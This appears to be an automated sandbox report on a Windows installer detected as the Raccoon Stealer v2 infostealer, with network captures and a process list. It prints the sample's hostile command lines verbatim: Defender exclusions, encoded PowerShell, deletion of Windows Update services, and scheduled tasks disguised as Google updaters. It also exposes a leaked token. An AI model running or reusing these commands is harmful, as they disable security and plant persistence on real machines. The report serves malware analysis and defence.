2023-01-04 15:49:34 UTC	66	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:34 UTC	66	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ffc5ca191ed-FRA
2023-01-04 15:49:34 UTC	66	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.4	50005	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:35 UTC	66	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:35 UTC	66	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:35 UTC	67	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:35 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ffe4db72c6d-FRA
2023-01-04 15:49:35 UTC	67	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.4	50008	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:35 UTC	67	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:35 UTC	67	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:35 UTC	67	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:35 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7845200008782bea-FRA
2023-01-04 15:49:35 UTC	68	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.4	50012	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:35 UTC	68	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:35 UTC	68	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:35 UTC	68	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:35 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78452001dd4d9b8f-FRA
2023-01-04 15:49:35 UTC	68	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Target ID:	0
Start time:	16:47:17
Start date:	04/01/2023
Path:	C:\Users\user\Desktop\Installer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Installer.exe
Imagebase:	0x400000
File size:	10032128 bytes
MD5 hash:	2522D780342912E8445B24A2591ECC8F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.344306639.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.333348862.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.337025443.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.361416689.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.342598570.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000002.465250354.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.343308304.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.339209426.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.340250464.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.345979893.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.338031072.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.338723877.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.339040601.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.342801779.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.360447760.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.341764922.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.340857306.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.345866968.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.336335986.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.333379170.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.335268908.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	16:47:44
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\1u8JL0XE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\LocalLow\1u8JL0XE.exe"
Imagebase:	0x7ff738d90000
File size:	2884608 bytes
MD5 hash:	9253ED091D81E076A3037E12AF3DC871
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 88%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Target ID:	2
Start time:	16:47:45
Start date:	04/01/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff730180000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	16:47:45
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	16:47:50
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\LocalLow\OBH7JYJN.exe"
Imagebase:	0x1000000
File size:	6436352 bytes
MD5 hash:	AAEAD1169523638D40CA4D884E3D787A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	16:47:55
Start date:	04/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	16:47:55
Start date:	04/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	16:47:55
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	16:47:55
Start date:	04/01/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff730180000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	10
Start time:	16:47:55
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	11
Start time:	16:47:56
Start date:	04/01/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6f3550000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	12
Start time:	16:47:56
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	13
Start time:	16:47:56
Start date:	04/01/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff730710000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	14
Start time:	16:47:56
Start date:	04/01/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff730710000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	15
Start time:	16:47:57
Start date:	04/01/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6f3550000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	16
Start time:	16:47:57
Start date:	04/01/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6f3550000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	17
Start time:	16:47:57
Start date:	04/01/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff730710000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	18
Start time:	16:47:57
Start date:	04/01/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6f3550000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	19
Start time:	16:47:57
Start date:	04/01/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff730710000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	20
Start time:	16:47:58
Start date:	04/01/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6f3550000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	21
Start time:	16:47:58
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Imagebase:	0x11b0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	22
Start time:	16:47:58
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Imagebase:	0x11b0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	23
Start time:	16:47:58
Start date:	04/01/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff751a80000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	24
Start time:	16:47:59
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	25
Start time:	16:47:59
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0xe70000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	26
Start time:	16:47:59
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	27
Start time:	16:47:59
Start date:	04/01/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff751a80000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	28
Start time:	16:47:59
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	29
Start time:	16:48:00
Start date:	04/01/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff751a80000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	30
Start time:	16:48:00
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Imagebase:	0xe70000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	31
Start time:	16:48:01
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	32
Start time:	16:48:01
Start date:	04/01/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff751a80000
